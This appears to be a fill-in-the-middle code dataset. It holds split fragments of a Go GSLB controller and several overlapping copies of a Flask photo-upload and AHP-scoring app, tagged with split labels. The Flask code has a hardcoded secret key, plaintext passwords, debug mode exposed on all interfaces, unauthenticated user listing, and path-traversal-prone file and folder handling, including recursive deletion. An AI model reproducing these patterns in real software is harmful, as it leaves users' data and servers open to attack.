if len(aviGS.(*AviGSObjectGraph).GetUniqueMemberObjs()) == 0 {
deleteGs = true
}
} else {
// avi graph not found, return
gslbutils.Warnf("key: %s, msg: no gs key found in gs models", key)
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
if deleteGs {
// add the object to the delete cache and remove from the model cache
SharedDeleteGSGraphLister().Save(modelName, aviGS)
SharedAviGSGraphLister().Delete(modelName)
} else {
SharedAviGSGraphLister().Save(modelName, aviGS)
}
if gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func isAcceptableObject(objType string) bool {
return objType == gslbutils.RouteType || objType == gslbutils.IngressType || objType == gslbutils.SvcType
}
func DequeueIngestion(key string) {
// The key format expected here is: operation/objectType/clusterName/Namespace/objName
gslbutils.Logf("key: %s, msg: %s", key, "starting graph sync")
objectOperation, objType, cname, ns, objName := gslbutils.ExtractMultiClusterKey(key)
sharedQueue := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
if !isAcceptableObject(objType) | {
gslbutils.Warnf("key: %s, msg: %s", key, "not an acceptable object, can't process")
return
} | conditional_block |
|
dq_ingestion.go | Name, key string, sharedQueue *utils.WorkerQueue) {
// First see if there's another instance of the same model in the store
modelName := tenant + "/" + gsName
bkt := utils.Bkt(modelName, sharedQueue.NumWorkers)
sharedQueue.Workqueue[bkt].AddRateLimited(modelName)
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "published key to rest layer")
}
func GetObjTrafficRatio(ns, cname string) int32 {
globalFilter := gslbutils.GetGlobalFilter()
if globalFilter == nil {
// return default traffic ratio
gslbutils.Errf("ns: %s, cname: %s, msg: global filter can't be nil at this stage", ns, cname)
return 1
}
val, err := globalFilter.GetTrafficWeight(ns, cname)
if err != nil {
gslbutils.Warnf("ns: %s, cname: %s, msg: error occured while fetching traffic info for this cluster, %s",
ns, cname, err.Error())
return 1
}
return val
}
func | (objType, cname, ns, objName, key, storeType string) interface{} {
var store *gslbutils.ClusterStore
switch objType {
case gslbutils.RouteType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedRouteStore()
} else {
store = gslbutils.GetRejectedRouteStore()
}
if store == nil {
// Error state, the route store is not updated, so we can't do anything here
gslbutils.Errf("key: %s, msg: %s", key, "accepted route store is empty, can't add route")
return nil
}
break
case gslbutils.IngressType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedIngressStore()
} else {
store = gslbutils.GetRejectedIngressStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted ingress store is empty, can't add ingress")
return nil
}
break
case gslbutils.SvcType:
if storeType == gslbutils.AcceptedStore {
store = gslbutils.GetAcceptedLBSvcStore()
} else {
store = gslbutils.GetRejectedLBSvcStore()
}
if store == nil {
gslbutils.Errf("key: %s, msg: %s", key, "accepted svc store is empty, can't add svc")
return nil
}
break
}
obj, ok := store.GetClusterNSObjectByName(cname, ns, objName)
if !ok {
gslbutils.Warnf("key: %s, objName: %s, msg: error finding the object in the %s store", key,
objName, storeType)
return nil
}
return obj
}
func PublishAllGraphKeys() {
agl := SharedAviGSGraphLister()
keys := agl.GetAll()
sharedQ := utils.SharedWorkQueue().GetQueueByName(utils.GraphLayer)
for _, key := range keys {
bkt := utils.Bkt(key, sharedQ.NumWorkers)
sharedQ.Workqueue[bkt].AddRateLimited(key)
gslbutils.Logf("process: resyncNodes, modelName: %s, msg: published key to rest layer", key)
}
}
func AddUpdateObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue,
fullSync bool, agl *AviGSGraphLister) {
var prevChecksum, newChecksum uint32
obj := getObjFromStore(objType, cname, ns, objName, key, gslbutils.AcceptedStore)
if obj == nil {
// error message already logged in the above function
return
}
metaObj := obj.(k8sobjects.MetaObject)
if metaObj.GetHostname() == "" {
gslbutils.Errf("key: %s, msg: %s", key, "no hostname for object, not supported")
return
}
if metaObj.GetIPAddr() == "" {
// IP Address not found, no use adding this as a GS
gslbutils.Errf("key: %s, msg: %s", key, "no IP address found for the object")
return
}
// get the traffic ratio for this member
memberWeight := GetObjTrafficRatio(ns, cname)
gsName := DeriveGSLBServiceName(metaObj.GetHostname())
modelName := utils.ADMIN_NS + "/" + gsName
found, aviGS := agl.Get(modelName)
if !found {
gslbutils.Logf("key: %s, modelName: %s, msg: %s", key, modelName, "generating new model")
aviGS = NewAviGSObjectGraph()
// Note: For now, the hostname is used as a way to create the GSLB services. This is on the
// assumption that the hostnames are same for a route across all clusters.
aviGS.(*AviGSObjectGraph).ConstructAviGSGraph(gsName, key, metaObj, memberWeight)
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: constructed new model", key, modelName,
*(aviGS.(*AviGSObjectGraph))))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
} else {
gsGraph := aviGS.(*AviGSObjectGraph)
prevHmChecksum := gsGraph.GetHmChecksum()
// since the object was found, fetch the current checksum
prevChecksum = gsGraph.GetChecksum()
// Update the member of the GSGraph's GSNode
aviGS.(*AviGSObjectGraph).UpdateGSMember(metaObj, memberWeight)
// Get the new checksum after the updates
newChecksum = gsGraph.GetChecksum()
newHmChecksum := gsGraph.GetHmChecksum()
gslbutils.Debugf("prevChecksum: %d, newChecksum: %d, prevHmChecksum: %d, newHmChecksum: %d, key: %s", prevChecksum,
newChecksum, prevHmChecksum, newHmChecksum, key)
if (prevChecksum == newChecksum) && (prevHmChecksum == newHmChecksum) {
// Checksums are same, return
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"the model for this key has identical checksums"))
return
}
aviGS.(*AviGSObjectGraph).SetRetryCounter()
gslbutils.Debugf(spew.Sprintf("key: %s, gsName: %s, model: %v, msg: %s", key, gsName, *gsGraph,
"updated the model"))
agl.Save(modelName, aviGS.(*AviGSObjectGraph))
}
// Update the hostname in the RouteHostMap
metaObj.UpdateHostMap(cname + "/" + ns + "/" + objName)
if !fullSync || gslbutils.IsControllerLeader() {
PublishKeyToRestLayer(utils.ADMIN_NS, gsName, key, wq)
}
}
func GetNewObj(objType string) (k8sobjects.MetaObject, error) {
switch objType {
case gslbutils.RouteType:
return k8sobjects.RouteMeta{}, nil
case gslbutils.IngressType:
return k8sobjects.IngressHostMeta{}, nil
case gslbutils.SvcType:
return k8sobjects.SvcMeta{}, nil
default:
return nil, errors.New("unrecognised object: " + objType)
}
}
func deleteObjOperation(key, cname, ns, objType, objName string, wq *utils.WorkerQueue) {
gslbutils.Logf("key: %s, objType: %s, msg: %s", key, objType, "recieved delete operation for object")
metaObj, err := GetNewObj(objType)
if err != nil {
gslbutils.Errf("key: %s, msg: %s", key, err.Error())
return
}
clusterObj := cname + "/" + ns + "/" + objName
// TODO: revisit this section to see if we really need this, or can we make do with metaObj
hostname := metaObj.GetHostnameFromHostMap(clusterObj)
if hostname == "" {
gslbutils.Logf("key: %s, msg: no hostname for the %s object", key, objType)
return
}
gsName := hostname
modelName := utils.ADMIN_NS + "/" + hostname
deleteGs := false
agl := SharedAviGSGraphLister()
found, aviGS := agl.Get(modelName)
if found {
if aviGS == nil {
gslbutils.Warnf("key: %s, msg: no avi graph found for this key", key)
| getObjFromStore | identifier_name |
app.py | '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit() | folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success | random_line_split |
|
app.py | '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8 | thods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify | 080, debug=True)
# app.run(debug=True)
@app.route('/page_list', me | conditional_block |
app.py | '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
| thods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify | for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', me | identifier_body |
app.py | GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
